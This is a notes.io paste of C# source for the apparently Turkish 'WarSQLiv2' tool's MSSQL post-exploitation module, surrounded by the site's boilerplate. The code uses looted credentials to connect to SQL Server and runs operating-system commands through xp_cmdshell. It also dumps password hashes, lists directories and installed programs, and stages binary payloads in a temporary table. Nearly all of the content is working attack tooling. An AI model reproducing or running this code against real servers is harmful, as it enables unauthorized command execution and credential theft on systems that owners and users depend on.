NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

Popular notes
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Common;
using System.Data.SqlClient;
using System.Linq;
using WarSQLiv2.Exploitation.Control;

namespace WarSQLiv2.Exploitation.PostExploitation
{
class MsSqlPostExploitation
{
private string _exception;
private string _exploitResult;
private string _exploitCode;
public List<string> _msSqlLogDirectoryList = new List<string>();
public List<string> _programList = new List<string>();
public string ExploitCode
{
get { return _exploitCode; }
set { _exploitCode = value; }
}
/// <summary>
/// Fırlatılan Exception'ı yakalayıp kullanıcıya göstermek için kullanılacak
/// </summary>
public string Exception
{
get { return _exception; }
set
{
_exception = string.Empty;
_exception = value;
}
}
public string ExploitResult
{
get { return _exploitResult; }
}

/// <summary>
/// Seçilen Listbox item'ını SelectedItem değerine mutlaka set etmemiz gerekir. Bu değer lstLooted'ın selectedItems'ının değeri olmalıdır.
/// </summary>
public string SelectedItem { get; set; }

/// <summary>
/// Kullanıcıdan gelen Exploitation komutları bu metod içerisinde çalışacak. Metodunun Exploitation kodları dinamik bir şekilde çağrıyı gönderen form tarafından set edilmedilir. Bu yüzden exploitation kodlarını ExploitCode stringi ile set etmemiz gerekir.
/// </summary>
public string SqlCommand { get; set; }
public byte[] BinaryData { get; set; }
public string mimiData { get; set; }
public List<string> LootedList { get; set; }
public List<string> VolumeList { get; set; }
public int SQLReaderValue { get; set; }
public void SqlExploitation()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var exploitCode = "";
exploitCode += "EXEC xp_cmdshell '"" + SqlCommand + ""';rn";
if (!string.IsNullOrEmpty(SelectedItem))
{
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(exploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
_exploitResult = string.Empty;
while (rdr.Read())
{
_exploitResult += $"{Environment.NewLine}{rdr[0]}";
}
rdr.Close();
conn.Close();

VolumeList = new List<string>();
var volumeListSpliter = _exploitResult.Trim().Split('r');
for (var i = 0; i < volumeListSpliter.Count(); i++)
{
VolumeList.Add(volumeListSpliter[i]);
}
VolumeList.Remove("");
VolumeList.Remove("n");
VolumeList.Remove("Caption ");

}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
else
{
Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
}
}
public void RunExploit()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(ExploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
_exploitResult = string.Empty;
while (rdr.Read())
{
_exploitResult += $"{Environment.NewLine}{rdr[SQLReaderValue]}";
}
rdr.Close();
conn.Close();
}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
public void ShowLogDirectory()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(ExploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
while (rdr.Read())
{
_msSqlLogDirectoryList.Add(rdr[2].ToString());
}
rdr.Close();
conn.Close();
}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
public void ShowProgramList()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
_programList.Clear();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(ExploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
while (rdr.Read())
{
_programList.Add(rdr[0].ToString());
_exploitResult += $"{Environment.NewLine}{rdr[0]}";
}
rdr.Close();
conn.Close();
}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
private void LootedControl()
{
var lootedFileControl = new LootedFileControl();
try
{
lootedFileControl.FileControl();
var lootedList = lootedFileControl.LootedList;
foreach (var t in lootedList)
{
LootedList.Add(t);
}
}
catch (Exception exp)
{
Exception = lootedFileControl.Exception;
}
}
public void HashDump()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var conn = new SqlConnection(conS);
var cmd = new SqlCommand(ExploitCode, conn);
conn.Open();
var rdr = cmd.ExecuteReader();
while (rdr.Read())
{
string value = string.Empty;
byte[] b = null;
b = (byte[])rdr[1];
var hex = BitConverter.ToString(b);
var hexCode = hex.Replace("-", "");

value = rdr[0].ToString() + " : " + hexCode;
_exploitResult += $"{Environment.NewLine}{value}";
}
rdr.Close();
conn.Close();
}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
public void CreateBinaryTable()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var cnn = new SqlConnection(conS);
var cmd = new SqlCommand();
cmd.Connection = cnn;
cmd.CommandText = "IF OBJECT_ID('WarSQLiTemp')IS NOT NULL DROP TABLE WarSQLiTemp" + Environment.NewLine + "CREATE TABLE dbo.WarSQLiTemp(binaryTable image);";
cnn.Open();
cmd.ExecuteNonQuery();
cnn.Close();

}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
public void InsertBinaryData()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var cnn = new SqlConnection(conS);
var cmd = new SqlCommand();

cmd.Connection = cnn;
cmd.CommandText = "insert into WarSQLiTemp(binaryTable) values(@binaryTable)";
var dbp = new SqlParameter("@binaryTable", SqlDbType.Image);
dbp.Value = BinaryData;
cmd.Parameters.Add(dbp);
cnn.Open();
cmd.ExecuteNonQuery();
cnn.Close();

}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
public void RemoveTempTable()
{
LootedControl();
var changeLang = new LanguageControl();
changeLang.FindLang();
var parcala = SelectedItem.Split(':');
var server = parcala[0];
var user = parcala[2];
var pass = parcala[3];
var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
try
{
var cnn = new SqlConnection(conS);
var cmd = new SqlCommand();

cmd.Connection = cnn;
cmd.CommandText = "DROP TABLE WarSQLiTemp";
cnn.Open();
cmd.ExecuteNonQuery();
cnn.Close();

}
catch (SqlException exp)
{
Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
}
}
}
}
     
 
what is notes.io
  

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
  
 
Looding Image
 
     
 
Long File
  
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.

  
     

Notes

I'm Feeling Lucky

repost for Instagram

Paste Keyboard iOS - Quick Replies

v 2.7.3

We'd love to hear from you. Please email us at [email protected]

Copyright 2022 Metromedya

ios uygulama geliştirme